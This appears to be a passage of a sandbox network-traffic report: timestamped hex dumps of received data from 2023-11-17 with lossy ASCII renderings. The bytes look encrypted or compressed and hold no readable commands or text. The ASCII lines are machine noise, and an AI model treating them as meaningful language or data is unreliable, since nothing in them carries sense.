ea cf 7d f2 41 d7 38 d7 9b e2 11 fb e6 1a c9 41 fe d6
                                                                                                                                                                                                Data Ascii: ]!m9Z0.&`K /t"/Z%Y=8G4%,_&k}f8#Q)R>'K4#6XBR+OSBEP)V_U791"wm]5o",u>hV\Cr}W cS?!\k}A8A
                                                                                                                                                                                                2023-11-17 18:25:36 UTC81INData Raw: 45 d2 3a c3 81 3b 3c 80 73 ae bb 8d c1 a4 4f 1d 55 1a 5a 17 4d 4d f5 92 67 27 1e db f4 fc 7a da 5a 50 38 5f f4 58 64 6a df 2b 99 51 42 ff 53 a8 18 94 e9 30 d4 c2 e3 ad 5c 95 fc b9 29 61 54 ec 46 e7 26 2a 83 d7 54 73 16 2c 70 65 aa 40 c3 2c 06 e0 19 da de 7c d4 fa dd f4 8a 51 61 c1 66 c5 64 d1 c2 ca fc 11 d5 36 de 54 86 36
                                                                                                                                                                                                Data Ascii: E:;<sOUZMMg'zZP8_Xdj+QBS0\)aTF&*Ts,pe@,|Qafd6T6
                                                                                                                                                                                                2023-11-17 18:25:36 UTC82INData Raw: d7 b1 4b ef b5 f6 98 b3 5a a8 94 b2 f6 90 be 81 d2 ab 70 11 41 ec 23 e8 51 c2 3e cb 0e ff 0f b8 2a 0d b6 0a f9 80 45 01 83 f2 33 9c e7 b3 11 fa fa 87 74 4d 94 e5 fd df 62 a8 6d 12 fe 31 87 b2 ee b6 66 22 08 09 de 21 a3 17 c6 24 97 a0 ba 5d 47 8d 01 ae 05 c6 47 11 b8 dc 40 49 af 06 38 43 ae 8c c0 06 29 11 f6 6b 1d 4f 05 57 5a de bf 9d bb 21 e6 c8 c4 e7 60 a4 a7 52 1c a7 47 2d fd 32 f7 26 c7 63 42 8f a9 13 28 63 98 d8 b9 6d 2e d2 ba e2 8a 91 f4 cd b8 d9 15 4f de dc 87 d0 a3 fc eb 0c e2 2f 76 c3 45 14 0f a1 f1 9c b8 71 ac ac 97 60 d0 a4 80 fe 7c 2e 0b 79 d3 b1 57 99 21 6a 55 62 16 9b 2d 7b b1 d3 bd 19 e7 b5 0e 4c ec d2 18 7c 15 3b e9 7a d7 32 2e 15 46 ac 7f 18 b5 e6 a4 22 2f c7 44 13 ea ee 1f df b2 3f f8 1c 36 ac 52 70 20 32 7a 35 82 b4 17 2a 52 46 62 68 c7
                                                                                                                                                                                                Data Ascii: KZpA#Q>*E3tMbm1f"!$]GG@I8C)kOWZ!`RG-2&cB(cm.O/vEq`|.yW!jUb-{L|;z2.F"/D?6Rp 2z5*RFbh
                                                                                                                                                                                                2023-11-17 18:25:36 UTC83INData Raw: 35 51 ae 7a 5a 79 fa 6f cd c7 fe 33 09 1f ae 12 7e 1f 66 1f df 92 4c 48 28 80 96 0c 7f 03 74 53 88 86 fc 9b 7b ef e0 0b ad a2 0d a8 04 83 c4 2d 6c 59 2d 21 d7 55 c1 18 19 fe ad 31 fe 06 25 0f 24 99 71 c4 b4 2d d7 3e d4 9c 59 38 78 18 0b d9 d1 57 4a 29 30 a9 d5 1c eb 26 79 80 fc e1 04 1c 38 17 45 ad 16 0b 76 da be 0c 90 06 60 ab a9 46 20 32 3a d4 6b bb 7a e9 71 dd 89 58 43 d0 89 b1 8e 61 9b 88 29 d4 a7 cd 97 7e b5 14 42 d6 05 5f 4e 11 42 45 56 b9 a4 3c 58 7a 5c d9 8f 2b 3c fa 5f b6 10 a7 ef 06 04 5d aa bf ec e0 3d f1 cc a8 c7 d3 20 d3 fe 3d 78 bf 8c d4 26 36 0d 7e 70 38 d9 2b 4e b3 3a 56 0d 74 9a 7b 96 93 2b 53 17 3e 59 16 85 38 33 54 d6 be fc b9 d2 30 93 45 ab 13 71 41 25 42 9a ca 54 5a cc 4a 8e 99 ea dc 47 7e 29 99 c8 57 35 ef b6 d1 ec 65 c1 5f e3 b0 fb
                                                                                                                                                                                                Data Ascii: 5QzZyo3~fLH(tS{-lY-!U1%$q->Y8xWJ)0&y8Ev`F 2:kzqXCa)~B_NBEV<Xz\+<_]= =x&6~p8+N:Vt{+S>Y83T0EqA%BTZJG~)W5e_
                                                                                                                                                                                                2023-11-17 18:25:36 UTC84INData Raw: 3b 4f 72 3b 2f dc 1e 90 4a 39 53 bc 47 6c b8 b7 50 c1 19 cc 55 5f 45 ca 6d 16 81 c6 59 44 42 9b 2b 7b ae c9 02 b9 bd d4 0e 9e 82 02 48 89 ec 92 87 1c cc 75 97 8f d3 fa b6 c1 82 ab 68 c9 35 26 5b d1 b6 d1 41 0f 6b 35 af b7 50 f9 2f 09 4f 5d 39 d5 c7 da 2b f7 ce 5f 32 22 b3 be ee 8e 15 bc 22 44 22 77 76 05 03 7b 6e 77 9e 16 f3 ac a3 5a c3 52 f3 bd 73 0e b3 b1 83 69 d2 81 56 b6 fd 3a e8 66 8c 73 eb c9 a7 e1 73 d4 3a 13 f2 17 a1 95 e2 0f 7a 1b 91 05 78 d2 39 65 f5 0f 85 b3 77 e8 bd 97 66 1e 42 63 cf 6f d1 7d ca 72 95 a6 d6 1a e2 15 13 ab 14 e4 a2 af 50 57 09 ae 3e db f0 89 6a 4a 3f 1b 8f 3c bf 89 9f 53 1e 53 d2 cd 4e cd 4f 21 be 6a b1 37 cf 2f 48 3a 9d a0 10 0f 8c ad 95 3b 10 b6 d8 3d 89 6f 16 1c eb 73 cb a6 b3 6f 5e 67 cf 45 01 35 84 5e c9 da 51 6e 12 87 ba
                                                                                                                                                                                                Data Ascii: ;Or;/J9SGlPU_EmYDB+{Huh5&[Ak5P/O]9+_2""D"wv{nwZRsiV:fss:zx9ewfBco}rPW>jJ?<SSNO!j7/H:;=oso^gE5^Qn
                                                                                                                                                                                                2023-11-17 18:25:36 UTC85INData Raw: ef 74 1d 37 42 71 98 65 eb 03 dc 9d a9 43 b4 77 57 e0 1d 6e 4b 12 ed 4f c2 2b 7b c5 63 96 a9 28 d7 46 33 e5 ec d8 81 79 e2 c4 f6 4c 90 a7 28 9e 03 c6 0f 9a 02 91 19 1a 0f 47 48 fd 9a 56 18 9f 74 cd af 8c d5 4b 6d 76 10 dd cb c5 b6 c8 ab e6 90 23 89 f5 c0 83 ca 2e 18 70 bd 74 ca 18 d1 d1 30 ad c9 64 b6 83 35 4f 62 84 7f 62 2c 4e 1f 46 26 78 10 61 d2 81 3e 89 37 07 f2 1b d6 de b9 3f 61 5c b9 61 96 f6 4a 85 b6 e6 92 0f f9 96 37 05 32 20 b6 b6 55 ee a7 ce 4d af a3 bb 26 bd 75 a1 0b 6a 39 ca 9c fd 7f 13 dd de 75 1b 23 1f 68 55 70 ac 3a de c5 e0 54 6e 4c cf 4d 9f 71 f4 3a 3a 52 a1 cd 70 a6 98 e0 4c 1a b6 c7 d2 25 31 0d bf c1 c4 c5 62 47 dc f2 03 b1 d4 54 07 fa c2 3d 18 5b d4 95 1c af 67 15 d3 8d 34 ab be 39 51 56 9a 3e 5f d8 9c 95 69 fe 10 6e c9 f3 3f 95 34 9b
                                                                                                                                                                                                Data Ascii: t7BqeCwWnKO+{c(F3yL(GHVtKmv#.pt0d5Obb,NF&xa>7?a\aJ72 UM&uj9u#hUp:TnLMq::RpL%1bGT=[g49QV>_in?4
                                                                                                                                                                                                2023-11-17 18:25:36 UTC86INData Raw: a2 90 3c e1 86 9c d4 28 a2 fd 4d f6 ff ba 3e 1a 2d 96 a5 ed 81 cf e0 b0 c0 da 3d 87 de 6e 2e 51 7a b8 6e 29 41 8f ae e8 d7 d8 5e 23 58 42 a8 a6 01 4d 6b e3 d3 c5 27 8c e1 7e 81 f0 52 93 61 3b 98 2a 6d 9a ad 03 31 7a d4 6a f2 03 4c e4 82 df e6 6d 59 67 f2 3f 91 6c 02 de c2 d6 2f 18 07 c4 a6 c9 82 a6 87 ee 8c 61 ca df 73 03 7d 55 92 a9 14 e2 63 af 73 1e fb d1 3a 7e 59 c8 a7 d2 c2 52 92 0e 57 06 9c 5c 4e c8 51 75 94 55 54 5d 50 5c b0 05 d3 4a 72 7c ff 86 b4 26 51 ab 8c ad 0d 54 cb 06 83 44 b8 64 09 fb ae ea 15 ca 0b 69 23 53 7d 7a 8b 65 c3 ee 2b b1 bf d8 8c 7e 8d 49 e5 58 1a d3 a0 c2 24 8c 36 33 bb 02 3b f4 82 99 46 30 e6 ab d1 5c 3e bc 37 00 43 7c fb aa 12 d9 a2 b4 0b e1 65 f8 1b 4c ba 0f 79 be be a1 a7 d4 26 bc a3 2a fa 63 14 fe ee 38 e0 5f 8d 91 cf ae 42
                                                                                                                                                                                                Data Ascii: <(M>-=n.Qzn)A^#XBMk'~Ra;*m1zjLmYg?l/as}Ucs:~YRW\NQuUT]P\Jr|&QTDdi#S}ze+~IX$63;F0\>7C|eLy&*c8_B
                                                                                                                                                                                                2023-11-17 18:25:36 UTC88INData Raw: ab fb dd e9 ee 31 28 05 85 86 85 00 b6 3e 90 31 3f 47 55 a8 01 19 9e 46 12 6b 78 5c d7 92 1d 42 68 90 f9 0d 86 cb c8 10 03 6d 16 ca bf 22 b2 29 fe e4 59 75 bf 3b b4 f8 55 7d 57 a7 34 4d b4 a5 b2 f7 78 82 38 8d 86 31 4c 8f 39 91 44 8a 54 c8 76 a7 b4 c5 8a 39 04 35 0e 3b e8 c6 31 d4 69 e8 8a 1c 4d a1 58 dd 2a 4c d0 13 a2 ff c7 ed 11 17 48 b2 8f e3 69 3f fb 2d 6e 1a ff 62 fd 73 bf 5b 13 e0 ad 74 89 2b 5e fc b7 eb b4 03 c3 74 1c 10 d7 cb 8e b4 92 fd d0 82 5d 42 45 da d6 5a 8f 67 91 62 c1 52 61 b6 30 bc ee e8 25 e3 a7 14 68 8e d1 27 f5 8a 98 b1 ad 8f 95 fb d2 95 62 0c 1c 50 3c 96 cf 78 85 34 e8 e6 6b cd 1d 8b a1 8a bd ba 15 8b 44 80 fd 47 bd ed df dd 3c 1a ad db a7 54 c2 1e 63 a2 e6 64 df ef 27 8a 9e da 9a 62 94 70 6d c2 d2 59 b3 39 cf fc ae de 3b 4a 41 a9 e6
                                                                                                                                                                                                Data Ascii: 1(>1?GUFkx\Bhm")Yu;U}W4Mx81L9DTv95;1iMX*LHi?-nbs[t+^t]BEZgbRa0%h'bP<x4kDG<Tcd'bpmY9;JA
                                                                                                                                                                                                2023-11-17 18:25:36 UTC89INData Raw: 96 bd ab b8 2e 6f 49 06 38 4b 59 c5 8a 7b 5d 42 56 a7 5a 7c 09 bb cd d7 4a c3 61 56 6d 77 44 76 f8 7b b8 7b 3e 12 ef 5e 8e 91 58 e4 04 6a 0f aa 22 22 ce 2b ec 87 34 16 12 79 ce fa ef b4 fe 04 32 78 a7 55 92 52 3a 2f 46 f0 f3 63 a5 44 14 30 2c 66 13 bb 76 90 30 37 4b e8 be f4 15 f3 5e 85 e5 bf 86 2c f6 a3 2b f0 45 54 53 8d fb aa b0 36 9c d7 b7 8c 76 b9 1a 34 1e 3c ee 78 2d be 86 36 44 c1 06 67 2b bf 80 37 2e 82 e9 fd 11 66 55 c5 f8 90 33 12 72 c1 9c bf f4 15 61 58 b0 c9 9a a8 3d 81 88 e6 71 e3 15 c2 98 50 54 e5 98 ee 4d 84 e9 0b 65 ad a7 c9 d2 ca 9e d5 d9 a7 ca 20 92 cc 02 62 03 9c c4 02 2b 56 56 95 38 1f 84 2d ae 95 e7 87 71 7a 56 37 e1 a4 a1 42 4c 74 8e 37 a5 51 8b 59 2f fe 79 69 55 ac ef 5c d9 c5 ca aa 42 b7 65 03 d8 a2 61 4d 6e d7 26 26 a8 ee 46 cc eb
                                                                                                                                                                                                Data Ascii: .oI8KY{]BVZ|JaVmwDv{{>^Xj""+4y2xUR:/FcD0,fv07K^,+ETS6v4<x-6Dg+7.fU3raX=qPTMe b+VV8-qzV7BLt7QY/yiU\BeaMn&&F
                                                                                                                                                                                                2023-11-17 18:25:36 UTC90INData Raw: 31 3c 4d 47 08 db d8 d5 18 f9 6c b1 39 08 e3 59 22 29 cb 86 7f e6 e6 76 06 bb cb 58 53 01 ae 35 98 0a 9a 29 60 26 6d 81 6e fe 84 4f fe b2 1c a0 bf 56 4c 38 ee 14 c5 fa d1 f6 36 bb 29 1a 39 dc 2f a4 3c 02 51 4e e2 34 45 35 6b 9b f4 c5 d1 38 49 df 00 02 5c 1f 9e 96 fd 14 8a 02 3d c6 98 cc b9 3c 24 19 a9 2a 92 a9 4c 9f e3 8f 0c b1 51 9a 55 40 66 88 2d 39 3f b1 a8 d0 6b cb 98 e8 33 69 c4 29 73 0e c6 57 c0 bd f0 0d 58 bd b4 9f b7 5e c3 4b 0c ac 39 b7 88 ff 75 3b fa ba 11 0d c4 9a aa 76 e6 29 7c b7 74 aa de da 03 fc 51 cd 46 17 5c a1 aa 51 35 09 e3 95 48 fd 5c 47 75 17 a1 6f 12 71 44 89 7b 45 cb 41 87 a7 dc f9 54 99 bf ac 52 c0 70 d6 f8 98 0c 55 d3 c6 c4 6c 82 b1 1a d7 7d dc be 8c 74 ff 29 81 b1 d6 7e e9 87 d1 1e 23 91 f5 8d 55 1a 64 77 c7 d8 29 90 cb e5 fb 3d
                                                                                                                                                                                                Data Ascii: 1<MGl9Y")vXS5)`&mnOVL86)9/<QN4E5k8I\=<$*LQU@f-9?k3i)sWX^K9u;v)|tQF\Q5H\GuoqD{EATRpUl}t)~#Udw)=
                                                                                                                                                                                                2023-11-17 18:25:36 UTC91INData Raw: a5 71 03 dd 51 2f bd 70 93 9a 7e f3 c8 b2 71 b6 45 6c 52 fe 34 b7 16 36 71 d1 2f 70 f6 b1 a3 55 a9 b0 56 c7 1c d8 11 ae bf 88 24 f0 fa 8d 0b e2 0d fc 98 aa 24 ce 66 bd 9a 5e 6b 7f 7a 77 49 28 b2 e6 61 d0 e6 b4 3a 86 89 a7 dc b5 1e 19 4d f5 77 b9 33 98 15 57 dc fd 6f 1c a0 30 a4 12 91 70 5a f7 0d a3 df 9d 33 28 d5 2b b4 07 d7 25 73 ba 2d ae 5c 25 ec 01 15 f4 4c ec 71 36 a6 08 0c 88 18 08 60 c6 c4 7f 3b 28 84 24 ac da cf 6c 80 cd 61 91 eb 2c 54 6f 8a 9e ac 12 17 c1 67 39 29 5e d0 bd 79 97 60 dd b0 5f fa 0f 60 ad 23 d9 c3 38 11 46 2b 05 bc 2e df 93 fb d8 04 71 3e 6c f3 88 18 ac a4 07 ca 71 33 f7 da 61 b4 d4 5c c2 cf b7 db d6 4a ed 44 b9 68 76 c0 8b 7e 36 92 c0 fe ef 4a 2b 5a 9f 3f c1 1c fd c0 f8 2e de c7 2c 65 54 77 dd 95 8a 7a 25 ca 8b 4c 49 c6 ba a1 dc 51
                                                                                                                                                                                                Data Ascii: qQ/p~qElR46q/pUV$$f^kzwI(a:Mw3Wo0pZ3(+%s-\%Lq6`;($la,Tog9)^y`_`#8F+.q>lq3a\JDhv~6J+Z?.,eTwz%LIQ
                                                                                                                                                                                                2023-11-17 18:25:36 UTC93INData Raw: 41 c3 b3 31 27 72 f3 e5 93 e8 9c b2 d7 87 01 48 3b 0c 5b 81 b1 38 e1 6f a4 3c 4c d2 0d d9 03 b4 03 85 82 31 2d 89 d0 fa f3 4d 3d 50 3d 90 cb da 64 40 29 a6 27 4e 67 57 ba 2d 89 19 2f bf 14 3e 8a 18 16 80 1c 2b 17 2f 9d 60 65 f9 f1 db be 14 99 42 22 41 24 3a fd 61 ee fc f9 db c3 4e 0e 6f d1 74 32 63 23 72 e0 45 97 b1 22 70 65 c0 60 f4 4b 38 62 fb 5d ae 72 5c a6 e3 8d 62 b6 55 ae ca 32 fe aa 99 7c 40 de 0b 61 73 28 a9 37 3e 6a 1a 4f 4b 2a ae 7c cb 9a 5e d1 80 4b cc 57 4d dd 03 aa 85 02 16 a7 cc b8 39 59 6f 43 e5 be 01 93 d4 61 02 da 35 90 51 14 fa 75 75 a7 0e 36 c3 36 8e a7 18 00 b7 b5 be 2c 10 da 2f af 40 75 64 fa 26 b3 05 79 e1 42 66 e2 dd e1 bc af 35 87 84 f6 3e ef 54 a4 ce 36 ac eb 18 ad 48 51 7e 2a 99 1a 54 8e 2e 1a fe 3f cd 5f f3 39 9e a0 b5 c9 41 14
                                                                                                                                                                                                Data Ascii: A1'rH;[8o<L1-M=P=d@)'NgW-/>+/`eB"A$:aNot2c#rE"pe`K8b]r\bU2|@as(7>jOK*|^KWM9YoCa5Quu66,/@ud&yBf5>T6HQ~*T.?_9A
                                                                                                                                                                                                2023-11-17 18:25:36 UTC94INData Raw: 41 bd 55 61 ed d8 48 9f 46 91 4d e6 61 7d 44 0b 67 e1 f5 c3 0a 7f 34 c0 8b 8a 00 88 88 30 10 56 e8 92 6b d2 15 2f 30 3c 59 b3 23 b2 b9 c6 80 5a 0c 26 74 4d 28 9b c1 d5 d9 9d 2e ba d2 5f a0 a0 82 b1 34 9c 1c d6 5d 57 8d a5 7a da 53 0b f8 f7 50 2d 8e 50 08 c0 d4 33 53 4b 8b b6 7b db a6 16 d2 a4 8c 52 4a 9c 7d f4 e5 c5 96 46 bc 3e 4d bc e6 47 63 0a 38 58 ef 20 ae 92 15 d4 33 8d 2c a9 31 cf 3c 21 1c fd 51 e4 f9 45 3c e6 18 15 47 db db 45 e2 49 97 b7 db c0 98 66 b7 fb 9c ab 63 39 be 64 e3 43 62 f9 cc ff 4b 86 07 14 46 55 6f 6e 4d 60 9e 9f ae 08 91 43 f2 03 fc 01 af 62 f7 78 76 cc 58 68 1f ff f1 ef 60 97 41 a3 99 35 55 65 99 11 1e 8f 9f 83 05 31 e3 08 3d 37 31 14 c9 f8 7b fa 9d 19 e3 e5 a7 a7 b4 59 bb e5 67 f8 8a 21 dc f5 82 91 cb 98 a0 7d 49 41 d1 62 dc 0b 75
                                                                                                                                                                                                Data Ascii: AUaHFMa}Dg40Vk/0<Y#Z&tM(._4]WzSP-P3SK{RJ}F>MGc8X 3,1<!QE<GEIfc9dCbKFUonM`CbxvXh`A5Ue1=71{Yg!}IAbu
                                                                                                                                                                                                2023-11-17 18:25:36 UTC95INData Raw: b8 98 fb 3b a1 56 19 8e f0 d6 bc 73 8f 4a 59 31 47 e3 9d 1f 53 6d 15 42 f7 ba 66 dc a8 ef 2e 78 5a 7a 45 0e b8 f0 1f 83 b9 1d f7 20 40 d8 7b 17 70 3d a2 4f 57 4d 70 c2 6a 24 89 3c 0b f8 67 a9 c6 84 9c 3c 5b 29 ff b3 46 14 3c 75 be 87 97 de 3e 76 79 6e 4f b2 3a 76 e2 8e dc 6a 1d ec 4e f7 40 de 53 30 49 12 16 46 a5 dd 89 3f 70 7a 4f ee a1 54 ed dc 02 42 2a 4d cf d1 59 24 32 29 9e 6e e5 cb 4b 3a 60 af 9f 4e 13 5d cd 80 e2 79 1a 72 2f 9e 3d 64 3f 65 c2 08 1b 6d d5 c3 da a1 10 3f c6 4a fa eb f5 e4 32 35 e7 b0 34 35 d9 16 f2 ba 5e 2f a2 23 0f 1e 78 89 fb 75 3a fa 3c b8 9a bc 11 be 74 e5 86 5b 79 8b b6 e0 46 6c 6f b1 8a 30 c7 2b 90 96 5a 44 9a 36 b0 5a ab 2c 5f cb a0 41 be 45 67 74 c2 a5 8c a0 22 f2 18 61 35 8f 9c 8b b6 0c 32 da 76 6b d8 44 6d 98 85 a6 ad 86 4e
                                                                                                                                                                                                Data Ascii: ;VsJY1GSmBf.xZzE @{p=OWMpj$<g<[)F<u>vynO:vjN@S0IF?pzOTB*MY$2)nK:`N]yr/=d?em?J2545^/#xu:<t[yFlo0+ZD6Z,_AEgt"a52vkDmN
                                                                                                                                                                                                2023-11-17 18:25:36 UTC96INData Raw: e8 ec 57 b0 c8 3c 05 e1 fa 21 8e 89 d6 ad f6 7e 93 0c b6 90 c8 d7 fa a3 2a 4c d5 c2 64 a2 ff 89 8b 18 ca 09 c2 e9 19 08 7d c4 41 6e 11 fb c6 34 00 ef 76 6c a8 49 06 18 6a 1e f9 50 f3 a4 6b e8 cf dd d0 ae 72 4b cf ad 51 63 03 93 29 f6 b0 be 9b a9 7f 03 5e 25 60 79 29 0c 1d 14 2c 9b 04 ac 18 63 11 29 25 28 88 5f 3b 77 19 b9 85 32 93 00 a6 6c 93 b3 3d 92 cb 9f 84 e7 6e 77 b4 75 41 d0 09 ca 6c 30 d4 a3 e4 24 62 f9 63 73 7e 02 13 db f2 52 06 54 a9 92 13 24 1f 6e 22 60 5f b8 16 b8 2d e9 65 91 d6 e9 96 59 72 ec 66 b1 c2 45 74 6e 21 bd a1 7e aa b2 8c 8f f5 c2 0a 38 ae a8 64 c4 44 b0 28 5b 99 75 e8 25 98 00 a0 14 f7 ae 28 8c fd 2d e8 a3 8e 49 ef 17 5e b9 49 e9 63 8d 48 31 3e 0c 8a a0 ab 22 32 0c 4a ef d8 b8 51 47 ae 49 b0 4f 17 f1 b8 5c ca 31 ed 0d e9 78 ca 31 01
                                                                                                                                                                                                Data Ascii: W<!~*Ld}An4vlIjPkrKQc)^%`y),c)%(_;w2l=nwuAl0$bcs~RT$n"`_-eYrfEtn!~8dD([u%(-I^IcH1>"2JQGIO\1x1
                                                                                                                                                                                                2023-11-17 18:25:36 UTC97INData Raw: 33 d3 c3 45 70 7c 57 bd ac 7b 50 86 19 5e f5 4e ed 48 a7 b7 3e d4 e2 bf 58 31 3d 85 c5 91 8c e0 bf fd 42 ae dc e3 70 e2 cc 01 0e 1f 39 b7 84 17 7e 90 57 3d e9 42 a5 e1 e1 40 a1 50 94 db da 28 ff b9 54 d6 90 33 a2 15 5e 22 4f f5 c7 1d ee 34 5c e7 cd 3d 48 de 20 0c bb 5c 26 01 1c cf 59 13 93 65 3a 8f 40 39 01 5c 6d 79 38 2b
                                                                                                                                                                                                Data Ascii: 3Ep|W{P^NH>X1=Bp9~W=B@P(T3^"O4\=H \&Ye:@9\my8+
                                                                                                                                                                                                2023-11-17 18:25:36 UTC98INData Raw: ee c8 f5 27 ef 82 dc ea 09 e2 e8 03 3c 8d 0d 70 42 4f 4e 22 a1 26 98 4a a9 0b a4 c8 c0 59 64 56 6e 20 88 6b 3d 45 74 01 b9 87 ee 4c b7 fe 64 fe 93 04 2a 53 8c dc fd 57 28 57 15 6b ab c5 d6 db 47 1a ba 6a d6 8f 7f 90 9b fb 6f 8b f5 31 cb 42 b9 a8 42 b8 26 c6 b3 c3 3f 6f e4 95 c1 a8 ed a8 ec 24 24 c1 04 0b fd eb c9 33 72 e6 cb 79 bd db 9b 74 04 ee 56 20 a0 ce ef 3b 24 65 9a a2 81 9a 6d 32 1f b9 8a a3 71 4f b5 36 2e 48 56 34 9d bd 68 7a 6f 8a 17 07 9e 04 37 e7 6c 90 45 ea 39 02 2d e5 c3 ea 5d 62 4d 10 7b cb a0 51 64 84 ef a0 65 6f 1c eb 69 d5 64 c6 30 39 c1 82 fc 0d c6 22 88 15 11 34 85 49 ba 10 2d d2 4f 35 f4 81 06 5b 77 a8 1f a8 fe b8 d5 a8 8e ca 4d 78 4e 25 d2 17 f1 29 1b e8 f1 10 1a 8c 33 c3 c2 21 fa c4 dd 51 e1 0e a0 74 46 10 b3 df 02 1d 06 a5 0d 2e f5
                                                                                                                                                                                                Data Ascii: '<pBON"&JYdVn k=EtLd*SW(WkGjo1BB&?o$$3rytV ;$em2qO6.HV4hzo7lE9-]bM{Qdeoid09"4I-O5[wMxN%)3!QtF.
                                                                                                                                                                                                2023-11-17 18:25:36 UTC99INData Raw: 2d b0 3a 7e 91 3f b8 a9 63 40 e5 6b f5 b5 73 ab e9 23 8e 7a 13 5f 71 43 f0 8e ab b9 f3 d0 cc a9 ba eb 70 c5 a4 04 65 e7 c0 ab 79 a9 36 de 1d 20 89 94 e1 01 a4 66 11 b0 77 61 d0 c0 3c 72 a2 14 6a da 20 a1 05 f4 16 d1 dd 1a 66 b1 fe c8 d3 b5 18 02 21 ce 62 00 73 c3 fc fe a8 68 52 8d e1 bb e4 91 c7 34 f4 aa ab 93 00 de 80 53 66 3f 38 68 da 0d 20 eb 8f b8 15 8a 1e 3f 71 81 80 29 e8 b6 e4 2c 6a b3 7d d3 51 c0 05 25 da 1f da 64 b2 de 6d 5d 80 fd cf 18 37 f3 e4 0b b4 98 1f a0 aa 6c b0 70 2a 4b 0b 86 a2 ed 9c ef c0 c2 9f 18 a9 0e 7a a4 35 f4 cf 38 22 80 4d ad 31 09 47 a7 35 00 13 e4 0d 11 d5 ae 53 e0 29 61 21 bc 5d cd 9f 89 6b 69 70 5b 4b e3 87 90 fc ca ae fe bd 6e d4 99 4d fe 6c 77 3c 72 ea ea 93 eb 3a 48 86 70 13 f8 d0 57 99 43 5a bf dc 71 15 38 d3 e2 9c d8 df
                                                                                                                                                                                                Data Ascii: -:~?c@ks#z_qCpey6 fwa<rj f!bshR4Sf?8h ?q),j}Q%dm]7lp*Kz58"M1G5S)a!]kip[KnMlw<r:HpWCZq8
                                                                                                                                                                                                2023-11-17 18:25:36 UTC100INData Raw: 00 85 70 71 99 3d 25 e2 ad cf 31 dc ac 04 f2 8e fa 3d 85 be 6e 3e 9a e2 de 17 e5 bb 45 85 77 f2 bd 99 94 02 90 a6 fc cb ff e2 73 4e f1 33 a6 df a3 c1 93 68 8e 2a 26 4a 86 ea b5 eb a3 02 a0 ed 94 c4 f1 32 58 cb 75 75 5c 80 9b 9e 13 3c 23 c7 07 ab ba 97 3e 8d 88 05 2b 6a 96 94 98 3e 26 4f e0 50 31 28 25 07 3d fd c3 49 22 32 fe 65 67 54 9a 2d cf 2b cc e2 ea 5f 8c 8d a2 f6 42 27 a3 75 da 1f 6f 7f a1 61 d7 f2 c5 e2 d3 92 2c 2d 05 f0 c3 9a 21 af 98 0c e0 8c b3 2a a5 87 a9 84 6c 6c a6 60 3f d0 82 a8 59 f0 60 19 6d 0b b7 48 a8 62 54 f4 12 fe 77 db 82 c1 27 11 4b 2e fb 24 d7 4e e0 97 4c db ce 03 5c b7 06 ea e1 ee 80 0c 3e 30 34 06 c5 0d 6f 65 fa 13 ab 76 42 a4 a3 ad 88 f4 0c d0 78 0a c0 22 b7 46 5b dc 54 b3 04 72 2b 20 bb de 1e d1 69 5a 15 40 a3 35 ae 33 7a ba 39
                                                                                                                                                                                                Data Ascii: pq=%1=n>EwsN3h*&J2Xuu\<#>+j>&OP1(%=I"2egT-+_B'uoa,-!*ll`?Y`mHbTw'K.$NL\>04oevBx"F[Tr+ iZ@53z9
                                                                                                                                                                                                2023-11-17 18:25:36 UTC101INData Raw: 3a 86 ef 67 b1 9c f7 eb 98 5d 5a 0e d2 50 de 71 36 4e ad d8 b6 63 bf 64 c6 bf 08 ce bf e0 d3 53 e0 28 3d 6d f2 0f 98 1d 5d e2 de 1a 50 f6 32 61 66 8c 5a eb 46 fc 42 4e 0e f3 e8 9b 58 2b fe 8f 2c de f6 2a 67 04 6d b7 c2 df 45 c5 75 22 fd ca ea 1b 33 fa e2 a0 ff 4b 5f d8 17 0f a5 c5 ee 88 0a 54 21 9e 8d 3c b4 a3 b7 f2 21 a3 de 26 fa 65 db 08 a1 0a f1 6c 75 15 60 8d 8a a6 64 81 62 25 b4 c6 1c ae 02 71 56 b3 50 35 80 ec 90 55 f6 b4 9e 09 ba 31 8c bd 48 d6 d7 65 98 ff 69 3d e7 a8 e3 a3 a5 70 97 27 24 cc 21 42 9f d5 0d 9e c5 bf 44 22 dc 00 be cf d6 87 e1 0e e2 ee 89 94 c0 68 4f 01 5e e2 22 d6 3a 87 5b 08 0e 13 b8 fb 55 9c 64 2d cb 07 fd a0 04 7e 00 4f d5 40 1a f2 4f 77 89 b6 7e 54 14 e2 ea e5 aa c4 2f ef d9 d9 41 0f 65 00 98 03 38 4e 06 44 dc bb 4e ad 69 03 6f
                                                                                                                                                                                                Data Ascii: :g]ZPq6NcdS(=m]P2afZFBNX+,*gmEu"3K_T!<!&elu`db%qVP5U1Hei=p'$!BD"hO^":[Ud-~O@Ow~T/Ae8NDNio
                                                                                                                                                                                                2023-11-17 18:25:36 UTC102INData Raw: df 9c 86 71 1f 5b 81 2d 44 f1 c2 02 58 d6 40 de cf 1d 28 a7 1a a0 ba ae db ea 70 56 4c 7e 3f 2d 56 b9 83 af a7 e2 3e 4b 0a c3 f5 1f 7a c0 3e ed a1 0f 0c 8b 36 7f ad 7c 5c 70 98 2a e4 bf 79 a0 61 7c eb 91 50 a3 bd 48 6e a3 46 33 80 0c 57 e0 eb 90 e3 26 b4 48 61 56 bb 53 1e c6 ad 86 0b 56 f4 85 70 0f 70 d7 6c b0 8f 7e 38 ee 7d ee 33 40 ed 59 82 9f 61 15 be fc 87 1c 12 08 cc 97 6f bc 89 ac 60 72 51 c6 be 5e 95 91 dd ef fe 87 b6 cd 6e 45 50 d7 c0 0a 1a 04 be 3a 1a 7c 34 52 8e ab 43 97 12 a7 2a c4 15 59 ac 3b 07 a4 79 a7 6d 6d 03 7b 67 86 80 f5 44 95 a9 ea c3 0c 8b db 47 68 1f ba a3 44 32 7c 14 7c ce 9c 07 04 29 b8 2f 72 3d d6 6a b4 9b ab 77 0c 6f db 0a e1 48 7d cf d8 63 06 ee 25 63 d5 93 18 6c 43 67 8a e2 dc 90 cf 4e 5b e6 57 95 17 db 61 49 8c ad e8 e1 42 72
                                                                                                                                                                                                Data Ascii: q[-DX@(pVL~?-V>Kz>6|\p*ya|PHnF3W&HaVSVppl~8}3@Yao`rQ^nEP:|4RC*Y;ymm{gDGhD2||)/r=jwoH}c%clCgN[WaIBr
